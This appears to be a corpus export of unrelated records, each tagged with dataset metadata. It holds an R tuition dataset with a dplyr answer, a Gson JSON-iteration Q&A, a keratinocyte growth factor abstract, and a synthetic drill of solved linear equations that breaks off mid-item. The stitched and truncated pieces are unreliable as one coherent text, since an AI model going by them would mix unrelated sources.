"Antioch University Midwest", "Antioch University Santa Barbara", "Antioch University Seattle", "Apex School of Theology", "Appalachian Bible College", "Appalachian State University", "Aquinas College", "Aquinas College", "Arapahoe Community College", "Arcadia University", "Arizona Christian University", "Arizona State University", "Arizona Western College", "Arkansas Baptist College", "Arkansas Northeastern College", "Arkansas State University", "Arkansas State University Mid-South", "Arkansas State University: Beebe", "Arkansas State University: Mountain Home", "Arkansas State University: Newport", "Arkansas Tech University", "Arlington Baptist University", "Armstrong State University", "Art Academy of Cincinnati", "Art Center College of Design", "Art Institute of Houston", "Art Institute of Philadelphia", "Art Institute of Phoenix", "Art Institute of Pittsburgh", "ASA College", "Asbury University", "Asheville-Buncombe Technical Community College", "Ashford University", "Ashland Community and Technical College", "Ashland University", "Ashworth College", "Asnuntuck Community College", "Assumption College", "Assumption College for Sisters", "Athens State University", "Athens Technical College", "Atlanta Metropolitan State College", "Atlanta Technical College", "Atlantic Cape Community College", "Atlantic University College", "Auburn University", "Auburn University at Montgomery", "Augsburg University", "Augusta Technical College", "Augusta University", "Augustana College", "Augustana University", "Aultman College of Nursing and Health Sciences", "Aurora University", "Austin College", "Austin Community College", "Austin Graduate School of Theology", "Austin Peay State University", "Ave Maria University", "Averett University", "Avila University", "Azusa Pacific University", "Babson College", "Baker University", "Bakersfield College", "Baldwin Wallace University", "Ball State University", "Baltimore City Community College", "Baptist Bible College", "Baptist College of Florida", "Baptist College of Health Sciences", "Baptist Missionary Association Theological Seminary", "Baptist University of the Americas", "Barclay College", "Bard College", "Bard College at Simon's Rock", "Barnard College", "Barry University", "Barstow Community College", "Barton College", "Barton County Community College", "Bastyr University", "Bates College", "Bates Technical College", "Baton Rouge Community College", "Bay College", "Bay Mills Community College", "Bay Path University", "Bay State College", "Bayamon Central University", "Baylor University", "Beacon College", "Beaufort County Community College", "Becker College", "Beckfield College", "Beis Medrash Heichal Dovid", "Belhaven University", "Bellarmine University", "Bellevue College", "Bellevue University", "Bellin College", "Bellingham Technical College", "Belmont Abbey College", "Belmont College", "Belmont University", "Beloit College", "Bemidji State University", "Benedict College", "Benedictine College", "Benedictine University", "Benjamin Franklin Institute of Technology", "Bennett College for Women", "Bennington College", "Bentley University", "Berea College", "Bergen Community College", "Bergin University of Canine Studies", "Berkeley City College", "Berklee College of Music", "Berkshire Community College" ), state = c("Montana", "Texas", "Georgia", "Minnesota", "California", "Colorado", "New York", "New York", "Michigan", "Virginia", "Florida", "Georgia", "South Carolina", "Colorado", "Alabama", "Alabama", "Alabama", "North Carolina", "Alaska", "Alaska", "New York", "Georgia", "Georgia", "Connecticut", "Michigan", "Pennsylvania", "Mississippi", "West Virginia", "Minnesota", "New York", "California", "Maryland", "Pennsylvania", "Ohio", "Iowa", "Kansas", "South Carolina", "California", "Michigan", "Michigan", "Pennsylvania", "Wisconsin", "Texas", "Texas", "Texas", "New York", "Illinois", "New York", "California", "Tennessee", "Arizona", "Massachusetts", "California", "Virginia", "Virginia", "Virginia", "Virginia", "Virginia", "Virginia", "West Virginia", "California", NA, NA, NA, "Massachusetts", "Alabama", "Indiana", "South Carolina", "Indiana", "Georgia", "Michigan", "Texas", "Texas", "Massachusetts", "Maryland", "Minnesota", "Minnesota", "California", "Ohio", "California", "Ohio", "California", "Washington", "North Carolina", "West Virginia", "North Carolina", "Michigan", "Tennessee", "Colorado", "Pennsylvania", "Arizona", "Arizona", "Arizona", "Arkansas", "Arkansas", "Arkansas", "Arkansas", "Arkansas", "Arkansas", "Arkansas", "Arkansas", "Texas", "Georgia", "Ohio", "California", "Texas", "Pennsylvania", "Arizona", "Pennsylvania", "New York", "Kentucky", "North Carolina", "California", "Kentucky", "Ohio", "Georgia", "Connecticut", "Massachusetts", "New Jersey", "Alabama", "Georgia", "Georgia", "Georgia", "New Jersey", NA, "Alabama", "Alabama", "Minnesota", "Georgia", "Georgia", "Illinois", "South Dakota", "Ohio", "Illinois", "Texas", "Texas", "Texas", "Tennessee", "Florida", "Virginia", "Missouri", "California", "Massachusetts", "Kansas", "California", "Ohio", "Indiana", "Maryland", "Missouri", "Florida", "Tennessee", "Texas", "Texas", "Kansas", "New York", "Massachusetts", "New York", "Florida", "California", "North Carolina", "Kansas", "Washington", "Maine", "Washington", "Louisiana", "Michigan", "Michigan", "Massachusetts", "Massachusetts", NA, "Texas", "Florida", "North Carolina", "Massachusetts", "Kentucky", "New York", "Mississippi", "Kentucky", "Washington", "Nebraska", "Wisconsin", "Washington", "North Carolina", "Ohio", "Tennessee", "Wisconsin", "Minnesota", "South Carolina", "Kansas", "Illinois", "Massachusetts", "North Carolina", "Vermont", "Massachusetts", "Kentucky", "New Jersey", "California", "California", "Massachusetts", "Massachusetts"), state_code = c("MT", "TX", "GA", "MN", "CA", "CO", "NY", "NY", "MI", "VA", "FL", "GA", "SC", "CO", "AL", "AL", "AL", "NC", "AK", "AK", "NY", "GA", "GA", "CT", "MI", "PA", "MS", "WV", "MN", "NY", "CA", "MD", "PA", "OH", "IA", "KS", "SC", "CA", "MI", "MI", "PA", "WI", "TX", "TX", "TX", "NY", "IL", "NY", "CA", "TN", "AZ", "MA", "CA", "VA", "VA", "VA", "VA", "VA", "VA", "WV", "CA", "AS", "DC", "PR", "MA", "AL", "IN", "SC", "IN", "GA", "MI", "TX", "TX", "MA", "MD", "MN", "MN", "CA", "OH", "CA", "OH", "CA", "WA", "NC", "WV", "NC", "MI", "TN", "CO", "PA", "AZ", "AZ", "AZ", "AR", "AR", "AR", "AR", "AR", "AR", "AR", "AR", "TX", "GA", "OH", "CA", "TX", "PA", "AZ", "PA", "NY", "KY", "NC", "CA", "KY", "OH", "GA", "CT", "MA", "NJ", "AL", "GA", "GA", "GA", "NJ", "PR", "AL", "AL", "MN", "GA", "GA", "IL", "SD", "OH", "IL", "TX", "TX", "TX", "TN", "FL", "VA", "MO", "CA", "MA", "KS", "CA", "OH", "IN", "MD", "MO", "FL", "TN", "TX", "TX", "KS", "NY", "MA", "NY", "FL", "CA", "NC", "KS", "WA", "ME", "WA", "LA", "MI", "MI", "MA", "MA", "PR", "TX", "FL", "NC", "MA", "KY", "NY", "MS", "KY", "WA", "NE", "WI", "WA", "NC", "OH", "TN", "WI", "MN", "SC", "KS", "IL", "MA", "NC", "VT", "MA", "KY", "NJ", "CA", "CA", "MA", "MA"), type = c("Public", "Private", "Public", "For Profit", "For Profit", "Public", "Private", "Public", "Private", "For Profit", "Private", "Private", "Public", "Public", "Public", "Public", "Public", "Public", "Private", "Private", "Private", "Public", "Public", "Private", "Private", "Private", "Public", "Private", "Public", "Private", "Public", "Public", "Private", "Private", "Private", "Public", "Private", "Private", "Private", "Public", "Private", "Private", "Public", "Public", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "For Profit", "For Profit", "For Profit", "For Profit", "For Profit", "For Profit", "Public", "Public", "Public", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Public", "Public", "Private", "Public", "Public", "Public", "Public", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Public", "Private", "Private", "Public", "Private", "Private", "Public", "Public", "Private", "Public", "Public", "Public", "Public", "Public", "Public", "Public", "Private", "Public", "Private", "Private", "For Profit", "For Profit", "For Profit", "For Profit", "For Profit", "Private", "Public", "For Profit", "Public", "Private", "For Profit", "Public", "Private", "Private", "Public", "Public", "Public", "Public", "Public", "Private", "Public", "Public", "Private", "Public", "Public", "Private", "Private", "Private", "Private", "Private", "Public", "Private", "Public", "Private", "Private", "Private", "Private", "Private", "Private", "Public", "Private", "Public", "Public", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Public", "Private", "Public", "Private", "Private", "Public", "Public", "Public", "Public", "Private", "For Profit", "Private", "Private", "Private", "Public", "Private", "For Profit", "Private", "Private", "Private", "Public", "Private", "Private", "Public", "Private", "Public", "Private", "Private", "Public", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Public", "Private", "Public", "Private", "Public"), degree_length = c("2 Year", "4 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "2 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "2 Year", "4 Year", "2 Year", "4 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "2 Year", "2 Year", "2 Year", "2 Year", "4 Year", "4 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "2 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "2 Year", "2 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "2 Year", "2 Year", "4 Year", "2 Year", "4 Year", "2 Year", "2 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "2 Year", "2 Year", "2 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "2 Year"), room_and_board = c(NA, 10350, 8474, NA, 16648, 8782, 16030, 11660, 11318, NA, 4200, 12330, NA, NA, 8379, NA, 5422, NA, 5700, 7300, 10920, 8878, NA, 13200, 12380, 12070, 9608, 8860, NA, 12516, NA, NA, 12140, 4000, 7282, 5070, 7230, NA, 10998, NA, NA, 8546, NA, NA, NA, NA, NA, 17955, 13255, 8640, 6250, 14300, 17362, NA, NA, NA, NA, NA, NA, NA, NA, NA, 14880, NA, 14740, NA, 9600, 9830, 9890, 10636, 9078, 5500, 9130, 14630, NA, NA, NA, NA, 7640, NA, NA, NA, NA, NA, 7960, 8304, 9332, NA, NA, 13800, 10674, 12648, 6700, 8826, NA, 8160, NA, 5280, NA, NA, 7870, 6500, 11385, 6700, NA, 9600, NA, 10928, 2758, 9500, 7160, NA, NA, NA, 9941, NA, NA, 12694, NA, NA, NA, NA, NA, NA, NA, 13332, 6980, 10280, NA, 9640, 10572, 8248, NA, 11700, 12527, NA, NA, 10700, 11436, 9976, 7200, 10076, 16312, 8410, NA, 9554, 10234, NA, 7500, 4612, 2900, 3150, 2500, 9300, 15488, 14916, 17225, 11100, NA, 10120, 5794, 7590, 15224, NA, NA, 3200, NA, 12799, 13300, NA, 12595, 11390, NA, 13800, NA, 4500, 8500, 12250, NA, 8730, NA, NA, 10355, NA, 12120, 8830, 8408, 6200, 10300, 9480, 12400, 8114, 15610, 16320, 6764, NA, NA, NA, 18180, NA), in_state_tuition = c(2380, 34850, 4128, 17661, 27810, 9440, 38660, 5375, 37087, 13680, 15150, 41160, 5160, 2281, 9698, 4440, 11068, 2310, 9300, 20830, 35105, 6726, 3246, 32060, 45775, 45306, 7144, 27910, 5416, 33484, 1418, 4140, 47540, 6400, 19970, 3150, 13340, 18000, 40258, 4530, 34885, 28302, 1998, 2670, 12840, 17160, 34100, 35160, 35160, 10950, 958, 35680, 31826, 18735, 18735, 18735, 18735, 18735, 18735, 8150, 1416, 3700, 48459, 6946, 56426, 6900, 17330, 28000, 30450, 17388, 29288, 2625, 8489, 37860, 4110, 5584, 5073, 1420, 35718, 20670, 16210, 22575, 27435, 6200, 14720, 7214, 32574, 23600, 4811, 43580, 26796, 10822, 2520, 8760, 2450, 8608, 3274, 3600, 3570, 3480, 9068, 13190, 6384, 33889, 43416, 24024, 14850, 21645, 23376, 14065, 30198, 2354, 12160, 5310, 21342, 1399, 4404, 40958, 5888, 6810, 3292, 4008, 3350, 5096, 4525, 11276, 10288, 38800, 3494, 10758, 42135, 33018, 18510, 24260, 39985, 2550, 11900, 8411, 20850, 34400, 19900, 38880, 51104, 29830, 1418, 32586, 9896, 2893, 14150, 12300, 14700, 6690, 7800, 19690, 54680, 55732, 55032, 29850, 1391, 30880, 3440, 26166, 53794, 4783, 3981, 4830, 3250, 34225, 27750, 5775, 45727, 39016, 2344, 39200, 4000, 9500, 25300, 42200, 4258, 9390, 22178, 2790, 18500, 4973, 34310, 50040, 8696, 16600, 29530, 34290, 18690, 18513, 54360, 49880, 39990, 5610, 9450, 1432, 42750, 8569), in_state_total = c(2380, 45200, 12602, 17661, 44458, 18222, 54690, 17035, 48405, 13680, 19350, 53490, 5160, 2281, 18077, 4440, 16490, 2310, 15000, 28130, 46025, 15604, 3246, 45260, 58155, 57376, 16752, 36770, 5416, 46000, 1418, 4140, 59680, 10400, 27252, 8220, 20570, 18000, 51256, 4530, 34885, 36848, 1998, 2670, 12840, 17160, 34100, 53115, 48415, 19590, 7208, 49980, 49188, 18735, 18735, 18735, 18735, 18735, 18735, 8150, 1416, 3700, 63339, 6946, 71166, 6900, 26930, 37830, 40340, 28024, 38366, 8125, 17619, 52490, 4110, 5584, 5073, 1420, 43358, 20670, 16210, 22575, 27435, 6200, 22680, 15518, 41906, 23600, 4811, 57380, 37470, 23470, 9220, 17586, 2450, 16768, 3274, 8880, 3570, 3480, 16938, 19690, 17769, 40589, 43416, 33624, 14850, 32573, 26134, 23565, 37358, 2354, 12160, 5310, 31283, 1399, 4404, 53652, 5888, 6810, 3292, 4008, 3350, 5096, 4525, 24608, 17268, 49080, 3494, 20398, 52707, 41266, 18510, 35960, 52512, 2550, 11900, 19111, 32286, 44376, 27100, 48956, 67416, 38240, 1418, 42140, 20130, 2893, 21650, 16912, 17600, 9840, 10300, 28990, 70168, 70648, 72257, 40950, 1391, 41000, 9234, 33756, 69018, 4783, 3981, 8030, 3250, 47024, 41050, 5775, 58322, 50406, 2344, 53000, 4000, 14000, 33800, 54450, 4258, 18120, 22178, 2790, 28855, 4973, 46430, 58870, 17104, 22800, 39830, 43770, 31090, 26627, 69970, 66200, 46754, 5610, 9450, 1432, 60930, 8569 ), out_of_state_tuition = c(2380, 34850, 12550, 17661, 27810, 20456, 38660, 9935, 37087, 13680, 15150, 41160, 8010, 13018, 17918, 8880, 19396, 8070, 9300, 20830, 35105, 19802, 5916, 32060, 45775, 45306, 7144, 27910, 5416, 33484, 7898, 9210, 47540, 6400, 19970, 3150, 13340, 18000, 40258, 6840, 34885, 28302, 4818, 5880, 12840, 17160, 34100, 35160, 35160, 10950, 958, 35680, 31826, 18735, 18735, 18735, 18735, 18735, 18735, 8150, 9546, 3700, 48459, 6946, 56426, 6900, 17330, 28000, 30450, 17388, 29288, 5535, 20939, 37860, 12180, 5584, 5073, 9760, 35718, 20670, 16210, 22575, 27435, 6200, 14720, 22021, 32574, 23600, 18671, 43580, 26796, 28336, 9510, 8760, 4250, 15298, 5014, 5760, 5580, 5310, 15848, 13190, 19866, 33889, 43416, 24024, 14850, 21645, 23376, 14065, 30198, 8114, 12160, 18000, 21342, 1399, 13170, 40958, 5888, 12870, 5962, 12088, 6020, 8096, 4525, 30524, 22048, 38800, 6164, 29796, 42135, 33018, 18510, 24260, 39985, 13020, 11900, 24467, 20850, 34400, 19900, 38880, 51104, 29830, 7838, 32586, 26468, 6973, 14150, 12300, 14700, 6690, 7800, 19690, 54680, 55732, 55032, 29850, 9131, 30880, 3440, 26166, 53794, 10214, 8059, 8910, 3250, 34225, 27750, 5775, 45727, 39016, 8104, 39200, 4000, 9500, 25300, 42200, 9689, 9390, 22178, 3460, 18500, 8070, 34310, 50040, 8696, 16600, 29530, 34290, 18690, 18513, 54360, 49880, 39990, 10650, 9450, 9622, 42750, 15589), out_of_state_total = c(2380, 45200, 21024, 17661, 44458, 29238, 54690, 21595, 48405, 13680, 19350, 53490, 8010, 13018, 26297, 8880, 24818, 8070, 15000, 28130, 46025, 28680, 5916, 45260, 58155, 57376, 16752, 36770, 5416, 46000, 7898, 9210, 59680, 10400, 27252, 8220, 20570, 18000, 51256, 6840, 34885, 36848, 4818, 5880, 12840, 17160, 34100, 53115, 48415, 19590, 7208, 49980, 49188, 18735, 18735, 18735, 18735, 18735, 18735, 8150, 9546, 3700, 63339, 6946, 71166, 6900, 26930, 37830, 40340, 28024, 38366, 11035, 30069, 52490, 12180, 5584, 5073, 9760, 43358, 20670, 16210, 22575, 27435, 6200, 22680, 30325, 41906, 23600, 18671, 57380, 37470, 40984, 16210, 17586, 4250, 23458, 5014, 11040, 5580, 5310, 23718, 19690, 31251, 40589, 43416, 33624, 14850, 32573, 26134, 23565, 37358, 8114, 12160, 18000, 31283, 1399, 13170, 53652, 5888, 12870, 5962, 12088, 6020, 8096, 4525, 43856, 29028, 49080, 6164, 39436, 52707, 41266, 18510, 35960, 52512, 13020, 11900, 35167, 32286, 44376, 27100, 48956, 67416, 38240, 7838, 42140, 36702, 6973, 21650, 16912, 17600, 9840, 10300, 28990, 70168, 70648, 72257, 40950, 9131, 41000, 9234, 33756, 69018, 10214, 8059, 12110, 3250, 47024, 41050, 5775, 58322, 50406, 8104, 53000, 4000, 14000, 33800, 54450, 9689, 18120, 22178, 3460, 28855, 8070, 46430, 58870, 17104, 22800, 39830, 43770, 31090, 26627, 69970, 66200, 46754, 10650, 9450, 9622, 60930, 15589)), row.names = c(NA, -200L), class = c("tbl_df", "tbl", "data.frame")) A: You can use diff/lag to calculate difference : library(dplyr) tuition_cost_clean %>% filter(degree_length == "4 Year") %>% arrange(state, desc(in_state_total)) %>% group_by(state_code) %>% slice(which.max(in_state_total), which.min(in_state_total)) %>% mutate(pct_change = -diff(in_state_total)/max(in_state_total) * 100) %>% select(name, state_code, in_state_total, pct_change) # name state_code in_state_total pct_change # <chr> <chr> <dbl> <dbl> # 1 Alaska Pacific University AK 28130 46.7 # 2 Alaska Bible College AK 15000 46.7 # 3 Auburn University AL 24608 72.3 # 4 Athens State University AL 6810 72.3 # 5 Arkansas Baptist College AR 17586 4.65 # 6 Arkansas State University AR 16768 4.65 # 7 Arizona Christian University AZ 37470 80.8 # 8 American Indian College of the Assemblies of God AZ 7208 80.8 # 9 American Jewish University CA 49188 80.8 #10 Bergin University of Canine Studies CA 9450 80.8 # … with 62 more rows
null
minipile
NaturalLanguage
mit
null
Q: How to iterate over json data with gson My json string is: { "recordsTotal":1331, "data":[ { "part_number":"3DFN64G08VS8695 MS", "part_type":"NAND Flash", "id":1154, "manufacturers":[ "3D-Plus" ] }, { "part_number":"3DPM0168-2", "part_type":"System in a Package (SiP)", "id":452, "manufacturers":[ "3D-Plus" ] }, { "part_number":"3DSD1G16VS2620 SS", "part_type":"SDRAM", "id":269, "manufacturers":[ "3D-Plus" ] } ] } This code lets me access the two highest level elements: JsonObject jsonObject = new JsonParser().parse(jsonString).getAsJsonObject(); System.out.println("data : " + jsonObject.get("data")); System.out.println("recordsTotal : " + jsonObject.get("recordsTotal")); But what I want to do is iterate over all the objects inside "data" and create a list of part_numbers. How do I do that? A: JsonArray is an Iterable<JsonElement>. So you can use for in loop. JsonObject jsonObject = new JsonParser().parse(jsonString).getAsJsonObject(); final JsonArray data = jsonObject.getAsJsonArray("data"); System.out.println("data : " + data); System.out.println("recordsTotal : " + jsonObject.get("recordsTotal")); List<String> list = new ArrayList<String>(); for (JsonElement element : data) { list.add(((JsonObject) element).get("part_number").getAsString()); }
null
minipile
NaturalLanguage
mit
null
Keratinocyte growth factor (FGF-7) stimulates migration and plasminogen activator activity of normal human keratinocytes. Keratinocyte growth factor (KGF), a member of the fibroblast growth factor (FGF) family (and alternatively designated FGF-7), is a paracrine growth factor produced by mesenchymal cells and mitogenic specifically for epithelial cells. The potential effect of KGF on wound healing was assessed in vitro by measuring randomized migration and plasminogen activator (PA) activity of keratinocytes in response to the growth factor. Incubation of normal human keratinocytes with KGF in modified MCDB 153 medium significantly stimulated cell migration and PA activity compared with control (p < 0.001 and p < 0.01, respectively). When tested in these assays on an equimolar basis, 1 nM KGF was at least as potent as transforming growth factor alpha and more active than basic FGF. None of these effects were observed when KGF was administered to fibroblasts or endothelial cells. Stimulation of keratinocyte migration by KGF was dose dependent, and a neutralizing monoclonal antibody against KGF reduced KGF-stimulated migration and cell growth. Zymographic analyses of cell extracts and conditioned medium from KGF-treated keratinocytes revealed increased PA activity, which was mainly attributable to an elevated level of urokinase-type PA. These in vitro results suggest that KGF may have an important role in stimulating reepithelialization during the process of wound repair.
null
minipile
NaturalLanguage
mit
null
w. -4 Solve -432*d + 228*d + 304 = -223*d for d. -16 Solve -164 = -16*j - 56 + 308 for j. 26 Solve -24*x - 210*x = -2574 for x. 11 Solve -110*h + 2638 - 3738 = 0 for h. -10 Solve 0 = 80*i - 123 - 117 for i. 3 Solve 1223*j + 5165 = 158*j - 24655 for j. -28 Solve -138 + 550 = -87*q - 23 for q. -5 Solve -158*p + 464*p = -201*p + 507 for p. 1 Solve 80*f - 683 - 437 = 0 for f. 14 Solve -246*h = -402*h + 3900 for h. 25 Solve 62*w + 32*w + 56 = -132 for w. -2 Solve 0 = 183*v + 32*v - 2*v + 118*v for v. 0 Solve -5372 = 35*x - 5862 for x. 14 Solve -279 = -104*m + 449 for m. 7 Solve 11*z - 607 - 523 = -778 for z. 32 Solve 0 = -292*c + 240*c - 780 for c. -15 Solve 5*w - 34 = -47 - 52 for w. -13 Solve -1910 = 7*g - 1805 for g. -15 Solve 1481*y = 1403 + 23774 for y. 17 Solve -19*o - 18*o = 15*o - 35*o for o. 0 Solve 255*i = -266*i + 549*i + 224 for i. -8 Solve -2459*i = -2460*i - 27 for i. -27 Solve 223*u + 840 = 163*u for u. -14 Solve 21168 = 339*b - 97*b + 542*b for b. 27 Solve 503 = 521*x + 9060 + 3947 for x. -24 Solve 28 - 6 = 26*g - 4 for g. 1 Solve -81718*t - 200 = -81726*t for t. 25 Solve 25*t + 98 - 18 = -15*t for t. -2 Solve 1041 - 202 = 32*h + 327 for h. 16 Solve -99*n - 249*n = -107*n + 131*n for n. 0 Solve 0 = 212*d - 192*d - 380 for d. 19 Solve -911*a + 1594 = 20725 for a. -21 Solve -2488*n - 255 = -2473*n for n. -17 Solve -9837*k + 312 = -4928*k - 4933*k for k. -13 Solve -14230 + 13195 = -45*u for u. 23 Solve 66*v - 36 = 60*v for v. 6 Solve 4387*p = 4330*p for p. 0 Solve -w - 16*w + 88 = -9*w for w. 11 Solve 0 = -3230*a + 3259*a + 174 for a. -6 Solve -216*k + 239 = -179*k - 316 for k. 15 Solve -76*y - 530 = -1594 for y. 14 Solve 75*g + 9635 = 8135 for g. -20 Solve -74 + 32 = -14*z for z. 3 Solve -561*c + 262*c + 120 = -284*c for c. 8 Solve -215 = -4607*j + 4596*j + 5 for j. 20 Solve 27*k + 510 = -49*k + 42*k for k. -15 Solve 17*g = -1127 + 1161 for g. 2 Solve 0 = 35*y - 282 - 138 for y. 12 Solve 5362 - 5719 = -21*q for q. 17 Solve -6 + 16 = 10*y for y. 1 Solve -9*i = -75 + 30 for i. 5 Solve -63*s - 78*s = -100*s + 451 for s. -11 Solve 0 = -62*r - 37 - 273 for r. -5 Solve -2*p + 0*p - 48 = -10*p for p. 6 Solve 7*y + 116 = -109*y for y. -1 Solve 252 = -181*k + 97*k for k. -3 Solve 27*h + 33*h - 60 = 0 for h. 1 Solve -3 + 4 - 105 = 26*z for z. -4 Solve 144 = -17*f - 152 - 95 for f. -23 Solve -69*a + 45043 = 42352 for a. 39 Solve -26*l + l - 13 = 37 for l. -2 Solve -r - 33 = 7*r - 65 for r. 4 Solve 274*m - 822 - 1370 = 0 for m. 8 Solve -37*c = 1611 - 3321 + 1340 for c. 10 Solve 174*t = 229*t - 203*t + 888 for t. 6 Solve -117*i - 2867 = -1346 for i. -13 Solve 2924*p - 2788*p + 1768 = 0 for p. -13 Solve 114*w + 490 = -244 - 748 for w. -13 Solve 42*v + 48921 = 49635 for v. 17 Solve 139*r - 121*r + 41 = -85 for r. -7 Solve -616 + 520 = -24*k for k. 4 Solve 2*u + 14*u + 106 = -86 for u. -12 Solve 18*k + 43 + 314 = 87 for k. -15 Solve -12069 = -459*w + 12*w for w. 27 Solve 409*w + 109*w - 1580 = 3600 for w. 10 Solve -6*b - 6*b - 40 = -10*b for b. -20 Solve 0 = -309*w + 10*w + 570 - 2065 for w. -5 Solve -45 = -19*y + 39 - 8 for y. 4 Solve 11 + 61 = u + 11*u for u. 6 Solve 9713 - 9881 = 12*j for j. -14 Solve 102*z + 19*z = -163*z - 48*z for z. 0 Solve 47*b - 824 - 967 = -152*b for b. 9 Solve 254*f + 2486 + 1819 = 49*f for f. -21 Solve 32925 = -28*n + 32449 for n. -17 Solve 3693 = -422*z - 4325 for z. -19 Solve 17*d + 17*d + 8*d = -11*d for d. 0 Solve 584 = 3*g - 91*g + 2784 for g. 25 Solve 0 = 19*d - 49 + 68 for d. -1 Solve 48*y - 12*y = -684 for y. -19 Solve 18500*v + 198 = 18482*v for v. -11 Solve 4*r - 7 = 7 - 42 for r. -7 Solve -89*j - 7*j = 55*j + 2718 for j. -18 Solve -408 = 111*v + 1479 for v. -17 Solve -1402 - 272 = -279*g for g. 6 Solve -127*p + 3536 = 145*p for p. 13 Solve 0 = f + 7*f - 2*f + 36 for f. -6 Solve 7*x - 2870 + 2947 = 0 for x. -11 Solve -990 + 587 = 31*b for b. -13 Solve 244*w + 2811 = -117 for w. -12 Solve 47*r = 57 + 436 - 1574 for r. -23 Solve 104*z + 369 = -45*z + 1561 for z. 8 Solve -2*n + 4*n - 22*n = -340 for n. 17 Solve -187*m + 1047*m = 3440 for m. 4 Solve -39*h + 201 = -33 for h. 6 Solve -884*j + 922*j = 988 for j. 26 Solve -2442 = 41*m - 2319 for m. -3 Solve -40*s + 19153 = 19593 for s. -11 Solve -6326*f + 5990*f - 9744 = 0 for f. -29 Solve 0 = -17133*a + 17271*a + 1242 for a. -9 Solve 143*q - 1641 = -629 + 1562 for q. 18 Solve 0 = -136*o + 8*o + 6*o - 244 for o. -2 Solve 8439*h + 11 = 8444*h - 104 for h. 23 Solve -177*p - 1917 = 179*p - 10105 for p. 23 Solve 212*j + 35318 = 29806 for j. -26 Solve -12*s + 2754 = 2550 for s. 17 Solve -41*x - 2234 = -2767 for x. 13 Solve 17*p = -121*p - 1104 for p. -8 Solve 29*v + 96 = -20 for v. -4 Solve 185*y + 149*y - 1602 = 245*y for y. 18 Solve -90 - 250 = -331*s + 7604 for s. 24 Solve 528*k + 263 + 2090 = -1871 for k. -8 Solve -488*v - 576 = -88 for v. -1 Solve 700 = 602*x - 582*x for x. 35 Solve -3525*w + 3527*w - 38 = 0 for w. 19 Solve 56*t - 453 + 61 = 0 for t. 7 Solve 59*u = 3*u + u + 605 for u. 11 Solve -383*h + 753*h - 379*h + 36 = 0 for h. 4 Solve -26*n - 6*n + 585 = 7*n for n. 15 Solve 0 = 96*m - 11*m - 680 for m. 8 Solve 42*s - 36 = -18*s + 78*s for s. -2 Solve -31 = 115*g + 11 + 73 for g. -1 Solve 614 + 372 = -37*m - 21*m for m. -17 Solve 0 = 57*y - 0*y - 6*y + 918 for y. -18 Solve -157*p = 14 - 14 for p. 0 Solve -345*k + 1311 = -96*k - 930 for k. 9 Solve 0 = 2698*m - 2704*m + 90 for m. 15 Solve 3300 = -168*n + 253*n + 245*n for n. 10 Solve -386*o + 1333 = -343*o for o. 31 Solve -187*o - 199*o = 2316 for o. -6 Solve 0 = -1172*d + 27058 + 15134 for d. 36 Solve 13252*t - 13268*t = -4 - 28 for t. 2 Solve 0 = -2942*a + 3015*a + 803 for a. -11 Solve 32*u - 2508 = 134*u + 12*u for u. -22 Solve -622 + 1894 = 106*j for j. 12 Solve -33*a = -23*a - 90 for a. 9 Solve -578*q + 20 = -574*q for q. 5 Solve -817 - 3334 = -185*g - 821 for g. 18 Solve -236*i + 428*i - 1086 = 258 for i. 7 Solve -140*r - 88*r = -12*r - 3456 for r. 16 Solve 171*d = 53*d + 826 for d. 7 Solve -76*d + 144*d = 73*d for d. 0 Solve 1876*w + 196 = 1848*w for w. -7 Solve 0 = -1494*g + 755*g + 796*g + 1368 for g. -24 Solve 49*r + 232 = -307 for r. -11 Solve -2329 = -290*z + 6261 + 1270 for z. 34 Solve 193*a + 285 = 136*a for a. -5 Solve 29*s + 5*s + 13*s + 564 = 0 for s. -12 Solve -156330*f = -156383*f + 212 for f. 4 Solve 3529 + 2055 - 2056 = 126*o for o. 28 Solve 0 = 13*j + 5*j + 85 + 5 for j. -5 Solve -2080 = -457*w - 509*w + 1018*w for w. -40 Solve 0 = 20030*z - 20015*z - 330 for z. 22 Solve 208*p + 238 + 122 = 3064 for p. 13 Solve -749*x + 374 = -766*x for x. -22 Solve 0 = 893*b - 902*b - 99 for b. -11 Solve 0 = 42*s + 936 - 600 for s. -8 Solve -106*h + 45 + 